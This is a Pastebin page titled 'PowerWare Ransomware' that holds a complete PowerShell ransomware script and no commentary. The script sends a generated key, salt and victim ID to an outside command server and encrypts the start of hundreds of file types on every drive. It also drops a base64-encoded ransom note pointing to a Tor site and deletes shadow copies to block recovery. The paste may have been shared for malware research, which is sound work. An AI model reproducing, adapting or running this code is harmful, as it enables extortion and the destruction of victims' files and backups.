API tools faq
paste
Demonslay335

PowerWare Ransomware

Demonslay335
Jul 18th, 2017
253
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.59 KB | None | 0 0
raw download clone embed print report
  1. $ScriptsPath = "HKCU:\Software\ENCRDEC\Scripts"
  2. $VersionString = "Version"
  3. if((Test-Path $ScriptsPath) -eq $true)
  4. {exit}
  5. else
  6. {
  7. New-Item -Path $ScriptsPath -Force | Out-Null
  8. New-ItemProperty -Path $ScriptsPath -Name $VersionString -Value "0" `
  9. -PropertyType DWORD -Force | Out-Null}
  10. $Password = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
  11. $Salt = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
  12. $VictimID = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
  13. $C2 = "http://joelosteel.gdn/pi.php"
  14. $Params = "string=$Password&string2=$Salt&uuid=$VictimID"
  15. $XMLHTTP = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
  16. $XMLHTTP.oPen('PoST', $C2, $faLse)
  17. $XMLHTTP.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
  18. $XMLHTTP.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
  19. $XMLHTTP.SetRequeStHeader("cONneCtiOn", "clOSe")
  20. $XMLHTTP.SeNd($Params)
  21. Start-Sleep -Seconds 120
  22. [BytE[]]$FileBytes=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($Password)
  23. $SaltBytes = [Text.Encoding]::UTF8.GetBytes($Salt)
  24. $AES = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
  25. $AES.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $Password, $SaltBytes, 5).GetBytes(32)
  26. $AES.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
  27. $AES.Padding="ZeRos"
  28. $AES.Mode="CBC"
  29. $Directory= gDr|where {$_.Free}|Sort-Object -Descending
  30. foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $Directory){
  31. gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
  32. try{
  33. $File = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
  34. if ($File.BaseStream.Length -lt 4096){
  35. $SizeToEncrypt = $File.BaseStream.Length
  36. }
  37. else
  38. {
  39. $SizeToEncrypt = 4096
  40. }
  41. $FileBytes = $File.ReadByTes($SizeToEncrypt)
  42. $File.Close()
  43. $CryptoTransform = $AES.CreateEncRyPtor()
  44. $MemoryStream = new-Object IO.MemoryStream
  45. $CryptoStream = new-Object Security.Cryptography.CryptoStream $MemoryStream,$CryptoTransform,"Write"
  46. $CryptoStream.Write($FileBytes, 0,$FileBytes.Length)
  47. $CryptoStream.Close()
  48. $MemoryStream.Close()
  49. $CryptoTransform.Clear()
  50. $EncryptedBytes = $MemoryStream.ToArray()
  51. $EncryptedFile = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
  52. $EncryptedFile.Write($EncryptedBytes,0,$EncryptedBytes.Length)
  53. $EncryptedFile.Close()
  54. $RansomNotePath = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
  55. $RansomNoteContents = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGZvbnQgZmFjZT0ibW9ub3NwYWNlIj48aDE+ISEhIElNUE9SVEFOVCBJTkZPUk1BVElPTiAhISEhPC9oMT48YnI+DQoNCkFsbCBvZiB5b3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgd2l0aCBSU0EtMjA0OCBhbmQgQUVTLTEyOCBjaXBoZXJzLjxicj4NCk1vcmUgaW5mb3JtYXRpb24gYWJvdXQgdGhlIFJTQSBhbmQgQUVTIGNhbiBiZSBmb3VuZCBoZXJlOjxicj4NCjxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIj5odHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKTwvYT48YnI+DQo8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL0FkdmFuY2VkX0VuY3J5cHRpb25fU3RhbmRhcmQiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvQWR2YW5jZWRfRW5jcnlwdGlvbl9TdGFuZGFyZDwvYT48YnI+DQogICANCjxwPkRlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBPTkxZIHBvc3NpYmxlIHdpdGggdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLjxicj4NCg0KVG8gcmVjZWl2ZSB5b3VyIHByaXZhdGUga2V5IGZvbGxvdyB0aGlzIGxpbms6PGJyPg0KDQoxLiA8YSBocmVmPSJodHRwOi8vNXp6Zmh6ZnRzcGFkbGdqZS5vbmlvbi50byI+aHR0cDovLzV6emZoemZ0c3BhZGxnamUub25pb24udG88L2E+PGJyPg0KDQo8cD5JZiB0aGUgYWRkcmVzcyBpcyBub3QgYXZhaWxhYmxlLCBmb2xsb3cgdGhlc2Ugc3RlcHM6PGJyPg0KMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgVG9yIEJyb3dzZXI6IDxhIGhyZWY9Imh0dHBzOi8vd3d3LnRvcnByb2plY3Qub3JnL2Rvd25sb2FkL2Rvd25sb2FkLWVhc3kuaHRtbCI+aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sPC9hPjxicj4NCjIuIEFmdGVyIGEgc3VjY2Vzc2Z1bCBpbnN0YWxsYXRpb24sIHJ1biB0aGUgYnJvd3NlciBhbmQgd2FpdCBmb3IgaW5pdGlhbGl6YXRpb24uPGJyPg0KMy4gVHlwZSBpbiB0aGUgYWRkcmVzcyBiYXI6IDV6emZoemZ0c3BhZGxnamUub25pb248YnI+DQo0LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGUgc2l0ZS48YnI+PC9mb250Pg=="));
  56. if(!(Test-path($RansomNotePath))){
  57. New-IteM -Path $RansomNotePath -ItemTyPe file -Value $RansomNoteContents
  58. AdD-Content -PAth $RansomNotePath -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $VictimID</p></font></h1>")
  59. }}
  60. catch
  61. {
  62.  
  63. }
  64. }}
  65. $ShadowCopies = Get-WmiObjEct Win32_ShadoWCopy
  66. ForEach($ShadowCopy in $ShadowCopies) {
  67. $ShadowCopy.Delete()
  68. }
  69. exit
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!